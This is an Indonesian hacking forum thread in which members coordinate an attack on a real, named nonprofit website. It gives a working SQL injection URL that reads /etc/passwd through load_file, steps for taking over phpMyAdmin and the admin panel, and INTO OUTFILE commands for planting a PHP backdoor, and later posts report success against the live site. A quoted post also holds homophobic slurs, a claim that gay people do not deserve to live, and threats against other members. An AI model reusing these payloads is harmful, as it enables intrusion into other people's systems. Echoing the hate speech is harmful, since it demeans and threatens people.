gblack's Challenge Level 1 - Hax This Site!

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:

Re: gblack's Challenge Level 1 - Hax This Site!

Post by 3xtr3m3b0y » Thu Dec 17, 2009 5:29 am

@Omz gblack:
cmn nambahin doank koq Omz biar ada kelanjutannya:

Level 1 : Take over Site Admin (Udah ada yg ngasih screenshotx)

Code: Select all

http://ioseaturtles.org/headline_detail.php?id=-1582+union+all+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8,9,10--

Langkah sampe mendapatkan lokasi ini bisa liat posting sebelomnya,Bag. Load_File tinggal ganti dengan lokasi ini dlm bentuk HEX:
/web/./ioseaturtles/_include/class.mysql.php

Nnt cari baris konf. koneksi ke database...

phpmyadmin page, bisa ditebak2 dl or scan pke page scanner:
http://ioseaturtles.org/phpmyadmin/

Cari tabel yg berisi user dan pass login yg tepat...

halaman webadmin, bisa nebak2 or scan :
http://ioseaturtles.org/webadmin/


Level 2 : Create PHP File / Backdoor

Code: Select all

Bermodalkan phpmyadmin yg telah diakses, bisa nyoba menggunakan INTO OUTFILE ke lokasi yg pasti dapat di tulisi mis: dir /tmp

Pada phpmyadmin pilih tab SQL, lalu ketikkan kodex, mis :

SELECT '3xtr3m3b0y w45 h3r3' INTO OUTFILE '/tmp/3xtr3m3b0y.php'

Jika tidak ada error kemungkinan berhasil, utk pastinya bisa memanfaatkan LOAD_FILE, ketikkan ini pada jendela SQL :

SELECT load_file('/tmp/3xtr3m3b0y.php')

atau masukkan alamat ini di address Browser :
http://ioseaturtles.org/headline_detail.php?id=-1582+union+all+select+1,2,3,load_file(0x2f746d702f33787472336d336230792e706870),5,6,7,8,9,10--

Jika berhasil seharusnya muncul isi dari file tersebut...

Kendala utama adalah mencari lokasi yg tepat pada web directory, untuk mencari lokasi target bisa menggunakan bantuan page scanner sprt Intellitamper, Acunetix dll, atau bisa jg mencari fasilitas upload file pada Admin Site yg telah diambil alih sebelumnya, lalu mencoba menggunakan lokasi tsb sebagai target penulisan file. Jika muncul pesan Error 13 berarti kita tdk diberi izin write...

Level 3 : Gaining Shell & Rooting
Dinantikan...


Mhn dikoreksi, krn pasti masih banyak kesalahanx, maklum msh CuPu Omz dan Kk skalian... :kaca:
...n0 l1m17...

User avatar
wiLMaR_kiDz
Posts: 964
Joined: Fri Mar 27, 2009 1:03 pm
Location: internet
Contact:

Re: gblack's Challenge Level 1 - Hax This Site!

Post by wiLMaR_kiDz » Thu Dec 17, 2009 5:57 am

gblack wrote:+1 Tey

Swt...
Pny gw didelete...
Maksud na apa??
Mengganggu kalian kah??
Ya deh...
Kalian emg ebad!

Source SQLi dumper gw jg diganti gambar org lagi coli... Ini membuktikan klo di antara elu emang pure GAY!! Najoss!! Gay tak pantas hidup!!
Sekarang klo elu emang bisa coding PHP, elu coding trus lu publish, trus gw ganti gambar emak lo gw ntod!! Ga usah malu2 babbi!!

Klo elo ga terima, kontak gw skarang!!

Klo mw ribut ga usah sembunyi2... Banci lo pada!!
Tinggal sebutin nickname / nama aza dah kelar...
Ntar gw samperin klo lo emang sifat na bikin rusuh and berani nanggung!!

Ini buad belajar, bukan bersaing njink!!

Forum Yogyafree Keren Yach!!

Mod & Admin: Jangan delete post gw ini, sbuah wujud protes pada orang yang ga mendukung ilmu pendidikan IT dengan mengganti source SQLi Dumper gw menjadi gambar GAY!!
hmm..slow down om gblack....
i think, this is a good thread.. :kaca:
and i argree to Fight & Fvck'n the FagGottz sh*t idiotta..!!..

sipp..di tnggu for videonya ntar om gbLack......
regards,
ordinary user,-

al-carati
Posts: 128
Joined: Sat Dec 12, 2009 11:03 pm
Location: Madinah an-Nabawiyah
Contact:

Re: gblack's Challenge Level 1 - Hax This Site!

Post by al-carati » Thu Dec 17, 2009 6:18 am

Sabar bung Gblack....
Ju2r aje tread ni sangat bagus koq coz nambah ilmu bung :tapa: :tapa: :tapa: lagi
“Tidaklah dua orang muslim saling bertemu kemudian berjabat tangan, kecuali akan diampuni (dosa-dosa) mereka berdua sebelum mereka berpisah.“HR Abu Dawud (no. 5212)
http://www.kajian.net/
Image

User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:

Re: gblack's Challenge Level 1 - Hax This Site!

Post by 3xtr3m3b0y » Thu Dec 17, 2009 6:29 am

@Omz wiLMaR_kiDz & al-carati :
Setuju Omz, oya Omz mhn pencerahan buat Level 3 donk Omz...

@Omz gblack:
Tuh Omz dah disupport, dilanjutin lg explorasinya Omz, mhn pencerahannya...!!!
...n0 l1m17...

User avatar
Bi4kKob4r
Posts: 254
Joined: Sat Jul 21, 2007 11:45 am
Location: Bi4kKob4r~root : ls..
Contact:

Re: gblack's Challenge Level 1 - Hax This Site!

Post by Bi4kKob4r » Thu Dec 17, 2009 12:24 pm

wah... kok punya gw pada ilang sih???
bukannya perasaan udah nanem... :gebrak: :gebrak: :gebrak:

siapa sih yang merasa jago disini... :rokok: :rokok: :rokok:

ini buat pendidikan omz... gw setuju ma omz gblack...
PM gw juga kalo merasa... :circle: :circle:
I think just : Make better than the best

Life is Love,
Love is Feeling,
Feeling is your heart,
Heart Controlling By your brain.

Always INject your brain with the greatest knowledges.

User avatar
tey
Posts: 68
Joined: Tue May 01, 2007 11:30 am
Location: heaven

Re: gblack's Challenge Level 1 - Hax This Site!

Post by tey » Thu Dec 17, 2009 1:17 pm

gblack wrote:+1 Tey

Swt...
Pny gw didelete...
Maksud na apa??
Mengganggu kalian kah??
Ya deh...
Kalian emg ebad!

Source SQLi dumper gw jg diganti gambar org lagi coli... Ini membuktikan klo di antara elu emang pure GAY!! Najoss!! Gay tak pantas hidup!!
Sekarang klo elu emang bisa coding PHP, elu coding trus lu publish, trus gw ganti gambar emak lo gw ntod!! Ga usah malu2 babbi!!

Klo elo ga terima, kontak gw skarang!!

Klo mw ribut ga usah sembunyi2... Banci lo pada!!
Tinggal sebutin nickname / nama aza dah kelar...
Ntar gw samperin klo lo emang sifat na bikin rusuh and berani nanggung!!

Ini buad belajar, bukan bersaing njink!!

Forum Yogyafree Keren Yach!!

Mod & Admin: Jangan delete post gw ini, sbuah wujud protes pada orang yang ga mendukung ilmu pendidikan IT dengan mengganti source SQLi Dumper gw menjadi gambar GAY!!


wadoh koq bisa y?? aku gak ngikut2 kk huehehehh,,,ak cuman pngen blajar gak berani delete2 file punya orang,,T_T sabar z kk mudh2an tu org dapet pacar seorang GAY..amin :rokok: :kaca: :kaca:

Code: Select all

@Kk Tey:
diperhatikan kode errorx Kk -> Error code 13 -> Permission denied
hrs nyari lokasi yg punya permission write utk user yg kt gunakan skrg
@ 3xtr3m3b0y

iya kk kmaren dh di cobain lagi and sukses thx infonya kk hehehe,, mf bru blajar :circle:
i am not detractor person..like u :)
be a good boy..

User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:

Re: gblack's Challenge Level 1 - Hax This Site!

Post by 3xtr3m3b0y » Thu Dec 17, 2009 2:19 pm

Wadoh udah ahh omz2 skalian, kembali ke tujuan awal kita, explorasi lebih jauh hingga yang terdalam tapi jangan merusak yah dan klo dah berhasil share ilmunya yakss Omz... :kaca:
...n0 l1m17...

User avatar
tey
Posts: 68
Joined: Tue May 01, 2007 11:30 am
Location: heaven

Re: gblack's Challenge Level 1 - Hax This Site!

Post by tey » Thu Dec 17, 2009 3:10 pm

3xtr3m3b0y wrote:Wadoh udah ahh omz2 skalian, kembali ke tujuan awal kita, explorasi lebih jauh hingga yang terdalam tapi jangan merusak yah dan klo dah berhasil share ilmunya yakss Omz... :kaca:

hueheheh benr om2 setubuh,, eh setujuh,,mohon bimbingan nya y kk2 sekalian :kaca:
i am not detractor person..like u :)
be a good boy..

User avatar
poni
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia
Contact:

Re: gblack's Challenge Level 1 - Hax This Site!

Post by poni » Fri Dec 18, 2009 7:25 pm

waks. webnya skrg malah not responding...... alias dimatiin.. mungkin lagi dipelajari kesalahannya oleh admin na kali. kemungkinan file yang ditanamkan dihapus oleh adminnya. bukan yg ngikut thread ini.
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001

User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:

Re: gblack's Challenge Level 1 - Hax This Site!

Post by 3xtr3m3b0y » Fri Dec 18, 2009 9:38 pm

poni wrote:waks. webnya skrg malah not responding...... alias dimatiin.. mungkin lagi dipelajari kesalahannya oleh admin na kali. kemungkinan file yang ditanamkan dihapus oleh adminnya. bukan yg ngikut thread ini.
Moga aja gtu Omz... :putusasa:
...n0 l1m17...

Post Reply

Return to “Web Hacking”